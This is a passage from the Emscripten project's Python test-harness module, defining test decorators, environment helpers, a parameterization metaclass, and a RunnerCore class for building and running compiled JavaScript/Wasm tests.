from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import get_canonical_temp_dir, try_delete, path_from_root
from tools.utils import MACOS, WINDOWS, read_file, read_binary, write_file, write_binary
from tools import shared, line_endings, building, config
logger = logging.getLogger('common')
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using a browser command line other than the default system
# browser.
# There are two special values that can be used here if running in an actual
# browser is not desired:
# EMTEST_BROWSER=0 : This will disable the actual running of the test and simply
# verify that it compiles and links.
# EMTEST_BROWSER=node : This will attempt to run the browser test under node.
# For most browser tests this does not work, but it can
# be useful for running pthread tests under node.
EMTEST_BROWSER = None
EMTEST_DETECT_TEMPFILE_LEAKS = None
EMTEST_SAVE_DIR = None
# Generally JS engines are equivalent, so testing one is enough. Set this
# to force testing on all JS engines; good for finding JS engine bugs.
EMTEST_ALL_ENGINES = None
EMTEST_SKIP_SLOW = None
EMTEST_LACKS_NATIVE_CLANG = None
EMTEST_VERBOSE = None
EMTEST_REBASELINE = None
EMTEST_FORCE64 = None
# Special value for passing to assert_returncode which means we expect the program
# to fail with a non-zero return code, but we don't care specifically which one.
NON_ZERO = -1
TEST_ROOT = path_from_root('tests')
WEBIDL_BINDER = shared.bat_suffix(path_from_root('tools/webidl_binder'))
EMBUILDER = shared.bat_suffix(path_from_root('embuilder'))
EMMAKE = shared.bat_suffix(path_from_root('emmake'))
WASM_DIS = Path(building.get_binaryen_bin(), 'wasm-dis')
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
# TODO(sbc): Should we make try_delete have a stronger guarantee?
assert not os.path.exists(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return str(Path(TEST_ROOT, *path_components))
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
def compiler_for(filename, force_c=False):
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
return EMXX
else:
return EMCC
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
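
# Hedged illustration (this helper is not part of the original file): skip_if can be
# used to build condition-based skip decorators, assuming the test class exposes the
# named predicate method (RunnerCore.is_wasm, defined further below).
def _example_requires_wasm(note=''):
    assert not callable(note)
    def decorator(f):
        return skip_if(f, 'is_wasm', note, negate=True)
    return decorator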
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
self.check_dylink()
return func(self, *args, **kwargs)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def require_node(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_node()
return func(self, *args, **kwargs)
return decorated
def require_v8(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_v8()
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
@wraps(f)
def decorated(self, *args, **kwargs):
self.setup_node_pthreads()
f(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Setting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
assert not callable(updates)
def decorated(f):
def modified(self, *args, **kwargs):
with env_modify(updates):
return f(self, *args, **kwargs)
return modified
return decorated
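
# Hedged usage sketch (the variable names are illustrative): env_modify temporarily
# overrides os.environ for a block, and with_env_modify does the same for a whole
# test method; mapping a key to None clears that variable.
def _example_env_modify_usage():
    with env_modify({'EMCC_DEBUG': '1', 'EMCC_CORES': None}):
        pass  # EMCC_DEBUG is '1' and EMCC_CORES is unset only inside this block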
def also_with_minimal_runtime(f):
assert callable(f)
def metafunc(self, with_minimal_runtime):
assert self.get_setting('MINIMAL_RUNTIME') is None
if with_minimal_runtime:
self.set_setting('MINIMAL_RUNTIME', 1)
f(self)
metafunc._parameterize = {'': (False,),
'minimal_runtime': (True,)}
return metafunc
def also_with_wasm_bigint(f):
assert callable(f)
def metafunc(self, with_bigint):
if with_bigint:
if not self.is_wasm():
self.skipTest('wasm2js does not support WASM_BIGINT')
if self.get_setting('WASM_BIGINT') is not None:
self.skipTest('redundant in bigint test config')
self.set_setting('WASM_BIGINT')
self.require_node()
self.node_args.append('--experimental-wasm-bigint')
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'bigint': (True,)}
return metafunc
def ensure_dir(dirname):
dirname = Path(dirname)
dirname.mkdir(parents=True, exist_ok=True)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_file(name, contents, binary=False):
name = Path(name)
assert not name.is_absolute()
if binary:
name.write_bytes(contents)
else:
name.write_text(contents)
def make_executable(name):
Path(name).chmod(stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
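# A minimal sketch of what the expansion above produces (hypothetical subclass of the RunnerCore
# class defined below; names chosen purely for illustration): given
#
#   class MyTests(RunnerCore):
#     @parameterized({'': (1,), 'big': (1024,)})
#     def test_alloc(self, size):
#       ...
#
# RunnerMeta replaces test_alloc with two concrete methods at class-creation time:
# test_alloc (running the body with size=1) and test_alloc_big (running it with size=1024).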
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in ASan yet')
if '-fsanitize=leak' in self.emcc_args:
self.skipTest('no dynamic linking support in LSan yet')
if '-fsanitize=undefined' in self.emcc_args:
self.skipTest('no dynamic linking support in UBSan yet')
def require_v8(self):
if not config.V8_ENGINE or config.V8_ENGINE not in config.JS_ENGINES:
if 'EMTEST_SKIP_V8' in os.environ:
self.skipTest('test requires v8 and EMTEST_SKIP_V8 is set')
else:
self.fail('d8 required to run this test. Use EMTEST_SKIP_V8 to skip')
self.js_engines = [config.V8_ENGINE]
self.emcc_args.append('-sENVIRONMENT=shell')
def require_node(self):
if not config.NODE_JS or config.NODE_JS not in config.JS_ENGINES:
if 'EMTEST_SKIP_NODE' in os.environ:
self.skipTest('test requires node and EMTEST_SKIP_NODE is set')
else:
self.fail('node required to run this test. Use EMTEST_SKIP_NODE to skip')
if self.get_setting('MEMORY64') == 1:
self.skipTest("MEMORY64=1 tests don't yet run under node")
self.js_engines = [config.NODE_JS]
def setup_node_pthreads(self):
self.require_node()
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super().setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super().setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror', '-Wno-limited-postlink-optimizations']
# We want to be strict about closure warnings in our test code.
# TODO(sbc): Remove this if we make it the default for `-Werror`:
# https://github.com/emscripten-core/emscripten/issues/16205):
self.ldflags = ['-sCLOSURE_WARNINGS=error']
self.node_args = [
      # Increase stack trace limit to maximise usefulness of test failure reports
'--stack-trace-limit=50',
# Opt in to node v15 default behaviour:
# https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode
'--unhandled-rejections=throw',
      # Include backtrace for all uncaught exceptions (not just Error).
'--trace-uncaught',
]
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
self.js_engines = config.JS_ENGINES.copy()
self.wasm_engines = config.WASM_ENGINES.copy()
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when --save-dir is used we still try to start with an empty directory as many tests
# expect this. --no-clean can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
if type(value) == bool:
value = int(value)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret.append(f'-s{key}')
elif type(value) == list:
ret.append(f'-s{key}={",".join(value)}')
else:
ret.append(f'-s{key}={value}')
return ret
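  # For illustration (settings chosen arbitrarily): {'EXIT_RUNTIME': 1,
  # 'EXPORTED_FUNCTIONS': ['_main', '_foo'], 'INITIAL_MEMORY': '32mb'} serializes to
  # ['-sEXIT_RUNTIME', '-sEXPORTED_FUNCTIONS=_main,_foo', '-sINITIAL_MEMORY=32mb'].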
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False, ldflags=True):
args = self.serialize_settings() + self.emcc_args
if ldflags:
args += self.ldflags
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
def verify_es5(self, filename):
es_check = shared.get_npm_cmd('es-check')
    # use --quiet once it's available
# See: https://github.com/dollarshaveclub/es-check/pull/126/
es_check_env = os.environ.copy()
es_check_env['PATH'] = os.path.dirname(config.NODE_JS[0]) + os.pathsep + es_check_env['PATH']
try:
# es-check prints the details of the errors to stdout, but it also prints
# stuff in the case there are no errors:
# ES-Check: there were no ES version matching errors!
# pipe stdout and stderr so that we can choose if/when to print this
# output and avoid spamming stdout when tests are successful.
shared.run_process(es_check + ['es5', os.path.abspath(filename)], stdout=PIPE, stderr=STDOUT, env=es_check_env)
except subprocess.CalledProcessError as e:
print(e.stdout)
self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=[], includes=[], force_c=False, js_outfile=True, emcc_args=[], output_basename=None):
suffix = '.js' if js_outfile else '.wasm'
compiler = [compiler_for(filename, force_c)]
if compiler[0] == EMCC:
# TODO(https://github.com/emscripten-core/emscripten/issues/11121)
# For historical reasons emcc compiles and links as C++ by default.
# However we want to run our tests in a more strict manner. We can
# remove this if the issue above is ever fixed.
compiler.append('-sNO_DEFAULT_TO_CXX')
if force_c:
compiler.append('-xc')
if output_basename:
output = output_basename + suffix
else:
basename = os.path.basename(filename)
output = shared.unsuffixed(basename) + suffix
cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + emcc_args + libraries
if shared.suffix(filename) not in ('.i', '.ii'):
# Add the location of the test file to include path.
cmd += ['-I.']
cmd += ['-I' + str(include) for include in includes]
self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(output)
if js_outfile and self.uses_memory_init_file():
src = read_file(output)
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
return output
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
js = read_file(javascript_file)
blob = "".join(js.splitlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([WASM_DIS, wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def measure_wasm_code_lines(self, wasm):
wat_lines = self.get_wasm_text(wasm).splitlines()
non_data_lines = [line for line in wat_lines if '(data ' not in line]
return len(non_data_lines)
def run_js(self, filename, engine=None, args=[],
output_nicerizer=None,
assert_returncode=0,
interleaved_output=True):
# use files, as PIPE can get too full and hang us
stdout_file = self.in_dir('stdout')
stderr_file = None
if interleaved_output:
stderr = STDOUT
else:
stderr_file = self.in_dir('stderr')
stderr = open(stderr_file, 'w')
error = None
timeout_error = None
if not engine:
engine = self.js_engines[0]
if engine == config.NODE_JS:
engine = engine + self.node_args
if engine == config.V8_ENGINE:
engine = engine + self.v8_args
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout_file, 'w'),
stderr=stderr,
assert_returncode=assert_returncode)
except subprocess.TimeoutExpired as e:
timeout_error = e
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
ret = read_file(stdout_file)
if not interleaved_output:
ret += read_file(stderr_file)
if output_nicerizer:
ret = output_nicerizer(ret)
if error or timeout_error or EMTEST_VERBOSE:
ret = limit_size(ret)
print('-- begin program output --')
print(read_file(stdout_file), end='')
print('-- end program output --')
if not interleaved_output:
print('-- begin program stderr --')
print(read_file(stderr_file), end='')
print('-- end program stderr --')
if timeout_error:
raise timeout_error
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with --verbose.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertFileContents(self, filename, contents):
if EMTEST_VERBOSE:
print(f'Comparing results contents of file: {filename}')
contents = contents.replace('\r', '')
if EMTEST_REBASELINE:
with open(filename, 'w') as f:
f.write(contents)
return
if not os.path.exists(filename):
self.fail('Test expectation file not found: ' + filename + '.\n' +
'Run with --rebaseline to generate.')
expected_content = read_file(filename)
message = "Run with --rebaseline to automatically update expectations"
self.assertTextDataIdentical(expected_content, contents, message,
filename, filename + '.new')
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s'" % (limit_size(value), limit_size(string)))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(read_binary(file1),
read_binary(file2))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init=None, cache_name_extra='', native=False):
if env_init is None:
env_init = {}
if make_args is None:
make_args = ['-j', str(shared.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
# get_library() is used to compile libraries, and not link executables,
# so we don't want to pass linker flags here (emscripten warns if you
# try to pass linker settings when compiling).
emcc_args = self.get_emcc_args(ldflags=False)
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
write_binary(bc_file, contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
if configure is not None:
# Avoid += so we don't mutate the default arg
configure = configure + configure_args
cflags = ' '.join(emcc_args)
env_init.setdefault('CFLAGS', cflags)
env_init.setdefault('CXXFLAGS', cflags)
return build_library(name, build_dir, output_dir, generated_libs, configure,
make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native)
def clear(self):
delete_contents(self.get_dir())
if EMSCRIPTEN_TEMP_DIR:
delete_contents(EMSCRIPTEN_TEMP_DIR)
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
    # In the long run it would be nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
print(e.stdout)
print(e.stderr)
self.fail(f'subprocess exited with non-zero return code({e.returncode}): `{shared.shlex_join(cmd)}`')
def emcc(self, filename, args=[], output_filename=None, **kwargs):
cmd = [compiler_for(filename), filename] + args
if output_filename:
cmd += ['-o', output_filename]
self.run_process(cmd, **kwargs)
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
  # exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
  # when run under the browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc() {
afunc("b");
}
''')
create_file('libc.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-sSIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.c', ['liba' + so])
ccshared('libc.c', ['liba' + so])
self.set_setting('MAIN_MODULE')
extra_args = ['-L.', 'libb' + so, 'libc' + so]
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n', emcc_args=extra_args)
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc_ptr)(), (*cfunc_ptr)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc_ptr = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc_ptr != NULL);
cfunc_ptr = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc_ptr != NULL);
bfunc_ptr();
cfunc_ptr();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = self.js_engines
for engine in js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
